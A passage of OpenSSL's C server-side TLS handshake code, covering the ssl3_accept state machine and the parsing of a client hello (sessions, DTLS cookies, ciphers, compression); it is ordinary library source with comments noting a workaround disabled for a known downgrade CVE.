if (cb != NULL) cb(s,SSL_CB_HANDSHAKE_START,1);
if ((s->version>>8) != 3)
{
SSLerr(SSL_F_SSL3_ACCEPT, ERR_R_INTERNAL_ERROR);
return -1;
}
if (!ssl_security(s, SSL_SECOP_VERSION, 0,
s->version, NULL))
{
SSLerr(SSL_F_SSL3_ACCEPT, SSL_R_VERSION_TOO_LOW);
return -1;
}
s->type=SSL_ST_ACCEPT;
if (s->init_buf == NULL)
{
if ((buf=BUF_MEM_new()) == NULL)
{
ret= -1;
goto end;
}
if (!BUF_MEM_grow(buf,SSL3_RT_MAX_PLAIN_LENGTH))
{
BUF_MEM_free(buf);
ret= -1;
goto end;
}
s->init_buf=buf;
}
if (!ssl3_setup_buffers(s))
{
ret= -1;
goto end;
}
s->init_num=0;
s->s3->flags &= ~TLS1_FLAGS_SKIP_CERT_VERIFY;
s->s3->flags &= ~SSL3_FLAGS_CCS_OK;
/* Should have been reset by ssl3_get_finished, too. */
s->s3->change_cipher_spec = 0;
if (s->state != SSL_ST_RENEGOTIATE)
{
/* Ok, we now need to push on a buffering BIO so that
* the output is sent in a way that TCP likes :-)
*/
if (!ssl_init_wbio_buffer(s,1)) { ret= -1; goto end; }
ssl3_init_finished_mac(s);
s->state=SSL3_ST_SR_CLNT_HELLO_A;
s->ctx->stats.sess_accept++;
}
else if (!s->s3->send_connection_binding &&
!(s->options & SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION))
{
/* Server attempting to renegotiate with
* client that doesn't support secure
* renegotiation.
*/
SSLerr(SSL_F_SSL3_ACCEPT, SSL_R_UNSAFE_LEGACY_RENEGOTIATION_DISABLED);
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_HANDSHAKE_FAILURE);
ret = -1;
goto end;
}
else
{
/* s->state == SSL_ST_RENEGOTIATE,
* we will just send a HelloRequest */
s->ctx->stats.sess_accept_renegotiate++;
s->state=SSL3_ST_SW_HELLO_REQ_A;
}
break;
case SSL3_ST_SW_HELLO_REQ_A:
case SSL3_ST_SW_HELLO_REQ_B:
s->shutdown=0;
ret=ssl3_send_hello_request(s);
if (ret <= 0) goto end;
s->s3->tmp.next_state=SSL3_ST_SW_HELLO_REQ_C;
s->state=SSL3_ST_SW_FLUSH;
s->init_num=0;
ssl3_init_finished_mac(s);
break;
case SSL3_ST_SW_HELLO_REQ_C:
s->state=SSL_ST_OK;
break;
case SSL3_ST_SR_CLNT_HELLO_A:
case SSL3_ST_SR_CLNT_HELLO_B:
case SSL3_ST_SR_CLNT_HELLO_C:
ret=ssl3_get_client_hello(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_SRP
s->state = SSL3_ST_SR_CLNT_HELLO_D;
case SSL3_ST_SR_CLNT_HELLO_D:
{
int al;
if ((ret = ssl_check_srp_ext_ClientHello(s,&al)) < 0)
{
/* callback indicates firther work to be done */
s->rwstate=SSL_X509_LOOKUP;
goto end;
}
if (ret != SSL_ERROR_NONE)
{
ssl3_send_alert(s,SSL3_AL_FATAL,al);
/* This is not really an error but the only means to
for a client to detect whether srp is supported. */
if (al != TLS1_AD_UNKNOWN_PSK_IDENTITY)
SSLerr(SSL_F_SSL3_ACCEPT,SSL_R_CLIENTHELLO_TLSEXT);
ret = SSL_TLSEXT_ERR_ALERT_FATAL;
ret= -1;
goto end;
}
}
#endif
s->renegotiate = 2;
s->state=SSL3_ST_SW_SRVR_HELLO_A;
s->init_num=0;
break;
case SSL3_ST_SW_SRVR_HELLO_A:
case SSL3_ST_SW_SRVR_HELLO_B:
ret=ssl3_send_server_hello(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_TLSEXT
if (s->hit)
{
if (s->tlsext_ticket_expected)
s->state=SSL3_ST_SW_SESSION_TICKET_A;
else
s->state=SSL3_ST_SW_CHANGE_A;
}
#else
if (s->hit)
s->state=SSL3_ST_SW_CHANGE_A;
#endif
else
s->state = SSL3_ST_SW_CERT_A;
s->init_num = 0;
break;
case SSL3_ST_SW_CERT_A:
case SSL3_ST_SW_CERT_B:
/* Check if it is anon DH or anon ECDH, */
/* normal PSK or KRB5 or SRP */
if (!(s->s3->tmp.new_cipher->algorithm_auth & (SSL_aNULL|SSL_aKRB5|SSL_aSRP))
&& !(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK))
{
ret=ssl3_send_server_certificate(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_TLSEXT
if (s->tlsext_status_expected)
s->state=SSL3_ST_SW_CERT_STATUS_A;
else
s->state=SSL3_ST_SW_KEY_EXCH_A;
}
else
{
skip = 1;
s->state=SSL3_ST_SW_KEY_EXCH_A;
}
#else
}
else
skip=1;
s->state=SSL3_ST_SW_KEY_EXCH_A;
#endif
s->init_num=0;
break;
case SSL3_ST_SW_KEY_EXCH_A:
case SSL3_ST_SW_KEY_EXCH_B:
alg_k = s->s3->tmp.new_cipher->algorithm_mkey;
/* clear this, it may get reset by
* send_server_key_exchange */
if ((s->options & SSL_OP_EPHEMERAL_RSA)
#ifndef OPENSSL_NO_KRB5
&& !(alg_k & SSL_kKRB5)
#endif /* OPENSSL_NO_KRB5 */
)
/* option SSL_OP_EPHEMERAL_RSA sends temporary RSA key
* even when forbidden by protocol specs
* (handshake may fail as clients are not required to
* be able to handle this) */
s->s3->tmp.use_rsa_tmp=1;
else
s->s3->tmp.use_rsa_tmp=0;
/* only send if a DH key exchange, fortezza or
* RSA but we have a sign only certificate
*
* PSK: may send PSK identity hints
*
* For ECC ciphersuites, we send a serverKeyExchange
* message only if the cipher suite is either
* ECDH-anon or ECDHE. In other cases, the
* server certificate contains the server's
* public key for key exchange.
*/
if (s->s3->tmp.use_rsa_tmp
/* PSK: send ServerKeyExchange if PSK identity
* hint if provided */
#ifndef OPENSSL_NO_PSK
|| ((alg_k & SSL_kPSK) && s->ctx->psk_identity_hint)
#endif
#ifndef OPENSSL_NO_SRP
/* SRP: send ServerKeyExchange */
|| (alg_k & SSL_kSRP)
#endif
|| (alg_k & SSL_kDHE)
|| (alg_k & SSL_kECDHE)
|| ((alg_k & SSL_kRSA)
&& (s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey == NULL
|| (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher)
&& EVP_PKEY_size(s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey)*8 > SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher)
)
)
)
)
{
ret=ssl3_send_server_key_exchange(s);
if (ret <= 0) goto end;
}
else
skip=1;
s->state=SSL3_ST_SW_CERT_REQ_A;
s->init_num=0;
break;
case SSL3_ST_SW_CERT_REQ_A:
case SSL3_ST_SW_CERT_REQ_B:
if (/* don't request cert unless asked for it: */
!(s->verify_mode & SSL_VERIFY_PEER) ||
/* if SSL_VERIFY_CLIENT_ONCE is set,
* don't request cert during re-negotiation: */
((s->session->peer != NULL) &&
(s->verify_mode & SSL_VERIFY_CLIENT_ONCE)) ||
/* never request cert in anonymous ciphersuites
* (see section "Certificate request" in SSL 3 drafts
* and in RFC 2246): */
((s->s3->tmp.new_cipher->algorithm_auth & SSL_aNULL) &&
/* ... except when the application insists on verification
* (against the specs, but s3_clnt.c accepts this for SSL 3) */
!(s->verify_mode & SSL_VERIFY_FAIL_IF_NO_PEER_CERT)) ||
/* never request cert in Kerberos ciphersuites */
(s->s3->tmp.new_cipher->algorithm_auth & SSL_aKRB5) ||
/* don't request certificate for SRP auth */
(s->s3->tmp.new_cipher->algorithm_auth & SSL_aSRP)
/* With normal PSK Certificates and
* Certificate Requests are omitted */
|| (s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK))
{
/* no cert request */
skip=1;
s->s3->tmp.cert_request=0;
s->state=SSL3_ST_SW_SRVR_DONE_A;
if (s->s3->handshake_buffer)
if (!ssl3_digest_cached_records(s))
return -1;
}
else
{
s->s3->tmp.cert_request=1;
ret=ssl3_send_certificate_request(s);
if (ret <= 0) goto end;
#ifndef NETSCAPE_HANG_BUG
s->state=SSL3_ST_SW_SRVR_DONE_A;
#else
s->state=SSL3_ST_SW_FLUSH;
s->s3->tmp.next_state=SSL3_ST_SR_CERT_A;
#endif
s->init_num=0;
}
break;
case SSL3_ST_SW_SRVR_DONE_A:
case SSL3_ST_SW_SRVR_DONE_B:
ret=ssl3_send_server_done(s);
if (ret <= 0) goto end;
s->s3->tmp.next_state=SSL3_ST_SR_CERT_A;
s->state=SSL3_ST_SW_FLUSH;
s->init_num=0;
break;
case SSL3_ST_SW_FLUSH:
/* This code originally checked to see if
* any data was pending using BIO_CTRL_INFO
* and then flushed. This caused problems
* as documented in PR#1939. The proposed
* fix doesn't completely resolve this issue
* as buggy implementations of BIO_CTRL_PENDING
* still exist. So instead we just flush
* unconditionally.
*/
s->rwstate=SSL_WRITING;
if (BIO_flush(s->wbio) <= 0)
{
ret= -1;
goto end;
}
s->rwstate=SSL_NOTHING;
s->state=s->s3->tmp.next_state;
break;
case SSL3_ST_SR_CERT_A:
case SSL3_ST_SR_CERT_B:
if (s->s3->tmp.cert_request)
{
ret=ssl3_get_client_certificate(s);
if (ret <= 0) goto end;
}
s->init_num=0;
s->state=SSL3_ST_SR_KEY_EXCH_A;
break;
case SSL3_ST_SR_KEY_EXCH_A:
case SSL3_ST_SR_KEY_EXCH_B:
ret=ssl3_get_client_key_exchange(s);
if (ret <= 0)
goto end;
if (ret == 2)
{
/* For the ECDH ciphersuites when
* the client sends its ECDH pub key in
* a certificate, the CertificateVerify
* message is not sent.
* Also for GOST ciphersuites when
* the client uses its key from the certificate
* for key exchange.
*/
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->state=SSL3_ST_SR_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
s->state=SSL3_ST_SR_NEXT_PROTO_A;
else
s->state=SSL3_ST_SR_FINISHED_A;
#endif
s->init_num = 0;
}
else if (SSL_USE_SIGALGS(s))
{
s->state=SSL3_ST_SR_CERT_VRFY_A;
s->init_num=0;
if (!s->session->peer)
break;
/* For sigalgs freeze the handshake buffer
* at this point and digest cached records.
*/
if (!s->s3->handshake_buffer)
{
SSLerr(SSL_F_SSL3_ACCEPT,ERR_R_INTERNAL_ERROR);
return -1;
}
s->s3->flags |= TLS1_FLAGS_KEEP_HANDSHAKE;
if (!ssl3_digest_cached_records(s))
return -1;
}
else
{
int offset=0;
int dgst_num;
s->state=SSL3_ST_SR_CERT_VRFY_A;
s->init_num=0;
/* We need to get hashes here so if there is
* a client cert, it can be verified
* FIXME - digest processing for CertificateVerify
* should be generalized. But it is next step
*/
if (s->s3->handshake_buffer)
if (!ssl3_digest_cached_records(s))
return -1;
for (dgst_num=0; dgst_num<SSL_MAX_DIGEST;dgst_num++)
if (s->s3->handshake_dgst[dgst_num])
{
int dgst_size;
s->method->ssl3_enc->cert_verify_mac(s,EVP_MD_CTX_type(s->s3->handshake_dgst[dgst_num]),&(s->s3->tmp.cert_verify_md[offset]));
dgst_size=EVP_MD_CTX_size(s->s3->handshake_dgst[dgst_num]);
if (dgst_size < 0)
{
ret = -1;
goto end;
}
offset+=dgst_size;
}
}
break;
case SSL3_ST_SR_CERT_VRFY_A:
case SSL3_ST_SR_CERT_VRFY_B:
/*
* This *should* be the first time we enable CCS, but be
* extra careful about surrounding code changes. We need
* to set this here because we don't know if we're
* expecting a CertificateVerify or not.
*/
if (!s->s3->change_cipher_spec)
s->s3->flags |= SSL3_FLAGS_CCS_OK;
/* we should decide if we expected this one */
ret=ssl3_get_cert_verify(s);
if (ret <= 0) goto end;
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->state=SSL3_ST_SR_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
s->state=SSL3_ST_SR_NEXT_PROTO_A;
else
s->state=SSL3_ST_SR_FINISHED_A;
#endif
s->init_num=0;
break;
#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
case SSL3_ST_SR_NEXT_PROTO_A:
case SSL3_ST_SR_NEXT_PROTO_B:
/*
* Enable CCS for resumed handshakes with NPN.
* In a full handshake with NPN, we end up here through
* SSL3_ST_SR_CERT_VRFY_B, where SSL3_FLAGS_CCS_OK was
* already set. Receiving a CCS clears the flag, so make
* sure not to re-enable it to ban duplicates.
* s->s3->change_cipher_spec is set when a CCS is
* processed in s3_pkt.c, and remains set until
* the client's Finished message is read.
*/
if (!s->s3->change_cipher_spec)
s->s3->flags |= SSL3_FLAGS_CCS_OK;
ret=ssl3_get_next_proto(s);
if (ret <= 0) goto end;
s->init_num = 0;
s->state=SSL3_ST_SR_FINISHED_A;
break;
#endif
case SSL3_ST_SR_FINISHED_A:
case SSL3_ST_SR_FINISHED_B:
/*
* Enable CCS for resumed handshakes without NPN.
* In a full handshake, we end up here through
* SSL3_ST_SR_CERT_VRFY_B, where SSL3_FLAGS_CCS_OK was
* already set. Receiving a CCS clears the flag, so make
* sure not to re-enable it to ban duplicates.
* s->s3->change_cipher_spec is set when a CCS is
* processed in s3_pkt.c, and remains set until
* the client's Finished message is read.
*/
if (!s->s3->change_cipher_spec)
s->s3->flags |= SSL3_FLAGS_CCS_OK;
ret=ssl3_get_finished(s,SSL3_ST_SR_FINISHED_A,
SSL3_ST_SR_FINISHED_B);
if (ret <= 0) goto end;
if (s->hit)
s->state=SSL_ST_OK;
#ifndef OPENSSL_NO_TLSEXT
else if (s->tlsext_ticket_expected)
s->state=SSL3_ST_SW_SESSION_TICKET_A;
#endif
else
s->state=SSL3_ST_SW_CHANGE_A;
s->init_num=0;
break;
#ifndef OPENSSL_NO_TLSEXT
case SSL3_ST_SW_SESSION_TICKET_A:
case SSL3_ST_SW_SESSION_TICKET_B:
ret=ssl3_send_newsession_ticket(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_SW_CHANGE_A;
s->init_num=0;
break;
case SSL3_ST_SW_CERT_STATUS_A:
case SSL3_ST_SW_CERT_STATUS_B:
ret=ssl3_send_cert_status(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_SW_KEY_EXCH_A;
s->init_num=0;
break;
#endif
case SSL3_ST_SW_CHANGE_A:
case SSL3_ST_SW_CHANGE_B:
s->session->cipher=s->s3->tmp.new_cipher;
if (!s->method->ssl3_enc->setup_key_block(s))
{ ret= -1; goto end; }
ret=ssl3_send_change_cipher_spec(s,
SSL3_ST_SW_CHANGE_A,SSL3_ST_SW_CHANGE_B);
if (ret <= 0) goto end;
s->state=SSL3_ST_SW_FINISHED_A;
s->init_num=0;
if (!s->method->ssl3_enc->change_cipher_state(s,
SSL3_CHANGE_CIPHER_SERVER_WRITE))
{
ret= -1;
goto end;
}
break;
case SSL3_ST_SW_FINISHED_A:
case SSL3_ST_SW_FINISHED_B:
ret=ssl3_send_finished(s,
SSL3_ST_SW_FINISHED_A,SSL3_ST_SW_FINISHED_B,
s->method->ssl3_enc->server_finished_label,
s->method->ssl3_enc->server_finished_label_len);
if (ret <= 0) goto end;
s->state=SSL3_ST_SW_FLUSH;
if (s->hit)
{
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->s3->tmp.next_state=SSL3_ST_SR_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
{
s->s3->tmp.next_state=SSL3_ST_SR_NEXT_PROTO_A;
}
else
s->s3->tmp.next_state=SSL3_ST_SR_FINISHED_A;
#endif
}
else
s->s3->tmp.next_state=SSL_ST_OK;
s->init_num=0;
break;
case SSL_ST_OK:
/* clean a few things up */
ssl3_cleanup_key_block(s);
BUF_MEM_free(s->init_buf);
s->init_buf=NULL;
/* remove buffering on output */
ssl_free_wbio_buffer(s);
s->init_num=0;
if (s->renegotiate == 2) /* skipped if we just sent a HelloRequest */
{
s->renegotiate=0;
s->new_session=0;
ssl_update_cache(s,SSL_SESS_CACHE_SERVER);
s->ctx->stats.sess_accept_good++;
/* s->server=1; */
s->handshake_func=ssl3_accept;
if (cb != NULL) cb(s,SSL_CB_HANDSHAKE_DONE,1);
}
ret = 1;
goto end;
/* break; */
default:
SSLerr(SSL_F_SSL3_ACCEPT,SSL_R_UNKNOWN_STATE);
ret= -1;
goto end;
/* break; */
}
if (!s->s3->tmp.reuse_message && !skip)
{
if (s->debug)
{
if ((ret=BIO_flush(s->wbio)) <= 0)
goto end;
}
if ((cb != NULL) && (s->state != state))
{
new_state=s->state;
s->state=state;
cb(s,SSL_CB_ACCEPT_LOOP,1);
s->state=new_state;
}
}
skip=0;
}
end:
/* BIO_flush(s->wbio); */
s->in_handshake--;
if (cb != NULL)
cb(s,SSL_CB_ACCEPT_EXIT,ret);
return(ret);
}
int ssl3_send_hello_request(SSL *s)
{
if (s->state == SSL3_ST_SW_HELLO_REQ_A)
{
ssl_set_handshake_header(s, SSL3_MT_HELLO_REQUEST, 0);
s->state=SSL3_ST_SW_HELLO_REQ_B;
}
/* SSL3_ST_SW_HELLO_REQ_B */
return ssl_do_write(s);
}
int ssl3_get_client_hello(SSL *s)
{
int i,j,ok,al=SSL_AD_INTERNAL_ERROR,ret= -1;
unsigned int cookie_len;
long n;
unsigned long id;
unsigned char *p,*d;
SSL_CIPHER *c;
#ifndef OPENSSL_NO_COMP
unsigned char *q;
SSL_COMP *comp=NULL;
#endif
STACK_OF(SSL_CIPHER) *ciphers=NULL;
if (s->state == SSL3_ST_SR_CLNT_HELLO_C && !s->first_packet)
goto retry_cert;
/* We do this so that we will respond with our native type.
* If we are TLSv1 and we get SSLv3, we will respond with TLSv1,
* This down switching should be handled by a different method.
* If we are SSLv3, we will respond with SSLv3, even if prompted with
* TLSv1.
*/
if (s->state == SSL3_ST_SR_CLNT_HELLO_A
)
{
s->state=SSL3_ST_SR_CLNT_HELLO_B;
}
s->first_packet=1;
n=s->method->ssl_get_message(s,
SSL3_ST_SR_CLNT_HELLO_B,
SSL3_ST_SR_CLNT_HELLO_C,
SSL3_MT_CLIENT_HELLO,
SSL3_RT_MAX_PLAIN_LENGTH,
&ok);
if (!ok) return((int)n);
s->first_packet=0;
d=p=(unsigned char *)s->init_msg;
/* use version from inside client hello, not from record header
* (may differ: see RFC 2246, Appendix E, second paragraph) */
s->client_version=(((int)p[0])<<8)|(int)p[1];
p+=2;
if (SSL_IS_DTLS(s) ? (s->client_version > s->version &&
s->method->version != DTLS_ANY_VERSION)
: (s->client_version < s->version))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_WRONG_VERSION_NUMBER);
if ((s->client_version>>8) == SSL3_VERSION_MAJOR &&
!s->enc_write_ctx && !s->write_hash)
{
/* similar to ssl3_get_record, send alert using remote version number */
s->version = s->client_version;
}
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
/* If we require cookies and this ClientHello doesn't
* contain one, just return since we do not want to
* allocate any memory yet. So check cookie length...
*/
if (SSL_get_options(s) & SSL_OP_COOKIE_EXCHANGE)
{
unsigned int session_length, cookie_length;
session_length = *(p + SSL3_RANDOM_SIZE);
cookie_length = *(p + SSL3_RANDOM_SIZE + session_length + 1);
if (cookie_length == 0)
return 1;
}
/* load the client random */
memcpy(s->s3->client_random,p,SSL3_RANDOM_SIZE);
p+=SSL3_RANDOM_SIZE;
/* get the session-id */
j= *(p++);
s->hit=0;
/* Versions before 0.9.7 always allow clients to resume sessions in renegotiation.
* 0.9.7 and later allow this by default, but optionally ignore resumption requests
* with flag SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION (it's a new flag rather
* than a change to default behavior so that applications relying on this for security
* won't even compile against older library versions).
*
* 1.0.1 and later also have a function SSL_renegotiate_abbreviated() to request
* renegotiation but not a new session (s->new_session remains unset): for servers,
* this essentially just means that the SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION
* setting will be ignored.
*/
if ((s->new_session && (s->options & SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION)))
{
if (!ssl_get_new_session(s,1))
goto err;
}
else
{
i=ssl_get_prev_session(s, p, j, d + n);
/*
* Only resume if the session's version matches the negotiated
* version.
* RFC 5246 does not provide much useful advice on resumption
* with a different protocol version. It doesn't forbid it but
* the sanity of such behaviour would be questionable.
* In practice, clients do not accept a version mismatch and
* will abort the handshake with an error.
*/
if (i == 1 && s->version == s->session->ssl_version)
{ /* previous session */
s->hit=1;
}
else if (i == -1)
goto err;
else /* i == 0 */
{
if (!ssl_get_new_session(s,1))
goto err;
}
}
p+=j;
if (SSL_IS_DTLS(s))
{
/* cookie stuff */
cookie_len = *(p++);
/*
* The ClientHello may contain a cookie even if the
* HelloVerify message has not been sent--make sure that it
* does not cause an overflow.
*/
if ( cookie_len > sizeof(s->d1->rcvd_cookie))
{
/* too much data */
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_COOKIE_MISMATCH);
goto f_err;
}
/* verify the cookie if appropriate option is set. */
if ((SSL_get_options(s) & SSL_OP_COOKIE_EXCHANGE) &&
cookie_len > 0)
{
memcpy(s->d1->rcvd_cookie, p, cookie_len);
if ( s->ctx->app_verify_cookie_cb != NULL)
{
if ( s->ctx->app_verify_cookie_cb(s, s->d1->rcvd_cookie,
cookie_len) == 0)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,
SSL_R_COOKIE_MISMATCH);
goto f_err;
}
/* else cookie verification succeeded */
}
else if ( memcmp(s->d1->rcvd_cookie, s->d1->cookie,
s->d1->cookie_len) != 0) /* default verification */
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,
SSL_R_COOKIE_MISMATCH);
goto f_err;
}
/* Set to -2 so if successful we return 2 */
ret = -2;
}
p += cookie_len;
if (s->method->version == DTLS_ANY_VERSION)
{
/* Select version to use */
if (s->client_version <= DTLS1_2_VERSION &&
!(s->options & SSL_OP_NO_DTLSv1_2))
{
s->version = DTLS1_2_VERSION;
s->method = DTLSv1_2_server_method();
}
else if (tls1_suiteb(s))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_ONLY_DTLS_1_2_ALLOWED_IN_SUITEB_MODE);
s->version = s->client_version;
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
else if (s->client_version <= DTLS1_VERSION &&
!(s->options & SSL_OP_NO_DTLSv1))
{
s->version = DTLS1_VERSION;
s->method = DTLSv1_server_method();
}
else
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_WRONG_VERSION_NUMBER);
s->version = s->client_version;
al = SSL_AD_PROTOCOL_VERSION;
goto f_err;
}
s->session->ssl_version = s->version;
}
}
n2s(p,i);
if ((i == 0) && (j != 0))
{
/* we need a cipher if we are not resuming a session */
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_CIPHERS_SPECIFIED);
goto f_err;
}
if ((p+i) >= (d+n))
{
/* not enough data */
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
if ((i > 0) && (ssl_bytes_to_cipher_list(s,p,i,&(ciphers))
== NULL))
{
goto err;
}
p+=i;
/* If it is a hit, check that the cipher is in the list */
if ((s->hit) && (i > 0))
{
j=0;
id=s->session->cipher->id;
#ifdef CIPHER_DEBUG
fprintf(stderr,"client sent %d ciphers\n",sk_SSL_CIPHER_num(ciphers));
#endif
for (i=0; i<sk_SSL_CIPHER_num(ciphers); i++)
{
c=sk_SSL_CIPHER_value(ciphers,i);
#ifdef CIPHER_DEBUG
fprintf(stderr,"client [%2d of %2d]:%s\n",
i,sk_SSL_CIPHER_num(ciphers),
SSL_CIPHER_get_name(c));
#endif
if (c->id == id)
{
j=1;
break;
}
}
/* Disabled because it can be used in a ciphersuite downgrade
* attack: CVE-2010-4180.
*/
#if 0
if (j == 0 && (s->options & SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG) && (sk_SSL_CIPHER_num(ciphers) == 1))
{
/* Special case as client bug workaround: the previously used cipher may
* not be in the current list, the client instead might be trying to
* continue using a cipher that before wasn't chosen due to server
* preferences. We'll have to reject the connection if the cipher is not
* enabled, though. */
c = sk_SSL_CIPHER_value(ciphers, 0);
if (sk_SSL_CIPHER_find(SSL_get_ciphers(s), c) >= 0)
{
s->session->cipher = c;
j = 1;
}
}
#endif
if (j == 0)
{
/* we need to have the cipher in the cipher
* list if we are asked to reuse it */
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_REQUIRED_CIPHER_MISSING);
goto f_err;
}
}
/* compression */
i= *(p++);
if ((p+i) > (d+n))
{
/* not enough data */
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
#ifndef OPENSSL_NO_COMP
q=p;
#endif
for (j=0; j<i; j++)
{
if (p[j] == 0) break;
}
p+=i;
if (j >= i)
{
/* no compress */
al=SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_COMPRESSION_SPECIFIED);
goto f_err;
}
#ifndef OPENSSL_NO_TLSEXT
/* TLS extensions*/
if (s->version >= SSL3_VERSION)
{
if (!ssl_parse_clienthello_tlsext(s,&p,d,n))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_PARSE_TLSEXT);
goto err;
}
}
/* Check if we want to use external pre-shared secret for this
* handshake for not reused session only. We need to generate
* server_random before calling tls_session_secret_cb in order to allow
* SessionTicket processing to use it in key derivation. */
{
unsigned char *pos;
pos=s->s3->server_random;
if (ssl_fill_hello_random(s, 1, pos, SSL3_RANDOM_SIZE) <= 0)
{
goto f_err;
}
}
if (!s->hit && s->version >= TLS1_VERSION && s->tls_session_secret_cb)
{
SSL_CIPHER *pref_cipher=NULL;
s->session->master_key_length=sizeof(s->session->master_key);
if(s->tls_session_secret_cb(s, s->session->master_key, &s->session->master_key_length,
ciphers, &pref_cipher, s->tls_session_secret_cb_arg))
{
s->hit=1;
s->session->ciphers=ciphers;
s->session->verify_result=X509_V_OK;
ciphers=NULL;
/* check if some cipher was preferred by call back */
pref_cipher=pref_cipher ? pref_cipher : ssl3_choose_cipher(s, s->session->ciphers, SSL_get_ciphers(s));
if (pref_cipher == NULL)
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_SHARED_CIPHER);
goto f_err;
}
s->session->cipher=pref_cipher;
if (s->cipher_list)
sk_SSL_CIPHER_free(s->cipher_list);
if (s->cipher_list_by_id)
sk_SSL_CIPHER_free(s->cipher_list_by_id);
s->cipher_list = sk_SSL_CIPHER_dup(s->session->ciphers);
s->cipher_list_by_id = sk_SSL_CIPHER_dup(s->session->ciphers);
}
}
#endif
/* Worst case, we will use the NULL compression, but if we have other
* options, we will now look for them. We have i-1 compression
* algorithms from the client, starting at q. */
s->s3->tmp.new_compression=NULL;
#ifndef OPENSSL_NO_COMP
/* This only happens if we have a cache hit */
if (s->session->compress_meth != 0)
{
int m, comp_id = s->session->compress_meth;
/* Perform sanity checks on resumed compression algorithm */
/* Can't disable compression */
if (!ssl_allow_compression(s))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_INCONSISTENT_COMPRESSION);
goto f_err;
}
/* Look for resumed compression method */
for (m = 0; m < sk_SSL_COMP_num(s->ctx->comp_methods); m++)
{
comp=sk_SSL_COMP_value(s->ctx->comp_methods,m);
if (comp_id == comp->id)
{
s->s3->tmp.new_compression=comp;
break;
}
}
if (s->s3->tmp.new_compression == NULL)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_INVALID_COMPRESSION_ALGORITHM);
goto f_err;
}
/* Look for resumed method in compression list */
for (m = 0; m < i; m++)
{
if (q[m] == comp_id)
break;
}
if (m >= i)
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_REQUIRED_COMPRESSSION_ALGORITHM_MISSING);
goto f_err;
}
}
else if (s->hit)
comp = NULL;
else if (ssl_allow_compression(s) && s->ctx->comp_methods)
{ /* See if we have a match */
int m,nn,o,v,done=0;
nn=sk_SSL_COMP_num(s->ctx->comp_methods);
for (m=0; m<nn; m++)
{
comp=sk_SSL_COMP_value(s->ctx->comp_methods,m);
v=comp->id;
for (o=0; o<i; o++)
{
if (v == q[o])
{
done=1;
break;
}
}
if (done) break;
}
if (done)
s->s3->tmp.new_compression=comp;
else
comp=NULL;
}
#else
/* If compression is disabled we'd better not try to resume a session
* using compression.
*/
if (s->session->compress_meth != 0)
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_INCONSISTENT_COMPRESSION);
goto f_err;
}
#endif
/* Given s->session->ciphers and SSL_get_ciphers, we must
* pick a cipher */
if (!s->hit)
{
#ifdef OPENSSL_NO_COMP
s->session->compress_meth=0;
#else
s->session->compress_meth=(comp == NULL)?0:comp->id;
#endif
if (s->session->ciphers != NULL)
sk_SSL_CIPHER_free(s->session->ciphers);
s->session->ciphers=ciphers;
if (ciphers == NULL)
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO,SSL_R_NO_CIPHERS_PASSED);
goto f_err;
}
ciphers=NULL;
if (!tls1_set_server_sigalgs(s))
{
SSLerr(SSL_F_SSL3_GET_CLIENT_HELLO, SSL_R_CLIENTHELLO_TLSEXT);
